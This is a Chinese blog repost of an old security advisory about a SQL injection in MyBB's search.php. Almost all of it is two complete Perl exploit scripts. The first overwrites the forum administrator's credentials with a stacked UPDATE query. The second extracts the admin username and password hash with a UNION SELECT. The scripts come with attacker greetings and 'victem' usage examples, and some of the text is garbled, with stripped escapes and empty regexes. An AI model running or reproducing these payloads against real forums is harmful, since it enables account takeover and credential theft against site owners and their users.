ITPub博客

首页 > 数据库 > 数据库开发技术 > MyBB finduser Search SQL Injection (Exploits)

MyBB finduser Search SQL Injection (Exploits)

原创 数据库开发技术 作者:coolwinds 时间:2005-08-21 21:37:46 0 删除 编辑
The following two exploits, exploit a vulnerability in MyBB's finduser searching functionality, one will try to add a user named crouz with administrative privileges to the system, while the other will grab the first available administrative username and dump his hashed password.

Credit:
The information has been provided by Alpha Programmer and Devil-00.[@more@]

Exploits #1:
#!/usr/bin/perl
###########################################
# Crouz.Com Security Team #
###########################################
# EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Xpl Change Admin's Pass For L0gin With P0wer User #
# #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln #
# #
###########################################
# GR33tz T0 ==> mh_p0rtal -- Dr-CephaleX -- The-Cephexin -- Djay_Agoustinno #
# No_Face_King -- Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
# #
# Special Lamerz : Hoormazd & imm02tal :P ++ xshabgardx #
###########################################
use IO::Socket;

if (@ARGV < 2)
{
print "n==========================================n";
print " n -- Exploit By Alpha Programmer(sirius) --nn";
print " Crouz Security Team nn";
print " Usage:

nn";
print "==========================================nn";
print "Examples:nn";
print " Mybb.pl www.Site.com /mybb/ n";
exit();
}

my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3ctedn";

$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0n";
$http .= "Host: $hostnnnn";


print "n";
print $remote $http;
print "Wait For Changing Password ...n";
sleep(10);

print "OK , Now Login With :n";
print "Username: crouzn";
print "Password: crouznn";
print "Enjoy ;)nn";

Exploits #2:
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#########[ MyBB SQL-Injection ]##############n";
print "# Coded By Devil-00 [ sTranger-killer ] #n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #n";
print "######################### #########n";
exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0){
print "[*] Trying $hostn";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui d,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $hostn";
$page =~ m// && print "[+] Search ID To Use : $1n";
exit;
}else{

print "[*] Trying $hostn";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $hostn";

$page =~ m/(.*?)/ && print "[+] User ID is: $1n";
print "[-] Unable to retrieve User IDn" if(!$1);

$page =~ m/(.*?)/ && print "[+] MD5 hash of password is: $1n";
print "[-] Unable to retrieve hash of passwordn" if(!$1);
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-804884/,如需转载,请注明出处,否则将追究法律责任。

上一篇: Phrack63期发布了
请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947366